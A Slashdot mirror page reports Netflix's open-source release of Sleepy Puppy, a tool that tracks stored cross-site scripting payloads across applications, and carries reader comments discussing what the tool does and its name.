Slashdot Mirror

← Back to Stories (view on slashdot.org)

Netflix Open Sources Sleepy Puppy XSS Hunter

Posted by samzenpus on from the try-it-out dept.

msm1267 writes: Netflix has released a tool it calls Sleepy Puppy. The tool injects cross-site scripting payloads into a target app that may not be vulnerable, but could be stored in a database and tracks the payload if it's reflected to a secondary application that makes use of the data in the same field. "We were looking for a way to provide coverage on applications that come from different origins or may not be publicly accessible," said co-developer Scott Behrens, a senior application security engineer at Netflix. "We also wanted to observe where stored data gets reflected back, and how data that may be stored publicly could also be reflected in a large number of internal applications." Sleepy Puppy is available on Netflix's Github repository and is one of a slew of security tools its engineers have released to open source.

12 comments

  1. oOo by Anonymous Coward · · Score: 0

    Can a similar method be used to detect NSA style snooping?

    1. Re: oOo by Anonymous Coward · · Score: 1

      More like Snoopy Puppy, amirite?

  2. Correct Me If I Am Wrong, But by zenlessyank · · Score: 0

    Does this mean they can inject their own data into a secure (or non-secure, for that matter) data stream, then track the injected data it to see where else it might go? Sounds fishy and/or evil.

    1. Re:Correct Me If I Am Wrong, But by taustin · · Score: 3, Informative

      Er, no. The summary is, as usual on /., largely unrelated to the actual article.

      It is apparently (the article is a little fuzzy, too) a tool for people designing web sites to track cross-site scripting, to look for vulnerabilities. This is a good thing. I think.

    2. Re:Correct Me If I Am Wrong, But by Anonymous Coward · · Score: 0

      no they pretty much hit the nail on the head.
      the program injects an "alert" message into a bunch of DB entries just to see if they are being used later by other programs.

    3. Re:Correct Me If I Am Wrong, But by erapert · · Score: 1

      the program injects an "alert" message into a bunch of DB entries just to see if they are being used later by other websites.

      Fixed that for you.

  3. Maybe next... by Anonymous Coward · · Score: 0

    they should figure out how to create a UI that isn't garbage.

  4. Lets call apps apps and websites websites by Anonymous Coward · · Score: 0

    injects cross-site scripting payloads into a target app

    It is not an app. It is a website.

    The fact that there is so much ajax junk that tries to make a website look like an app doesn't mean it isn't a website.

    1. Re:Lets call apps apps and websites websites by Anonymous Coward · · Score: 0

      But what about websites with apps as a front-end? Did you validate all the app input too? My understanding is that this tool's purpose is to inject as much as it can into whatever APIs it can use, then scrape everything and see what comes out, so when data comes in an app and goes out on the website, you can see if you've introduced an exploitable situation where XSS could work.

  5. Names by wonkey_monkey · · Score: 1

    Netflix has released a tool it calls Sleepy Puppy.

    Whatever happened to names that were at least tangentially related to the function of the software?

    --
    systemd is Roko's Basilisk.
  6. Actual Code by TFlan91 · · Score: 1

    Link to the actual repo:

    https://github.com/Netflix/sle...

  7. API by OakDragon · · Score: 1

    I wish they would bring back the API to access their catalog data.

    --
    Dark Reflection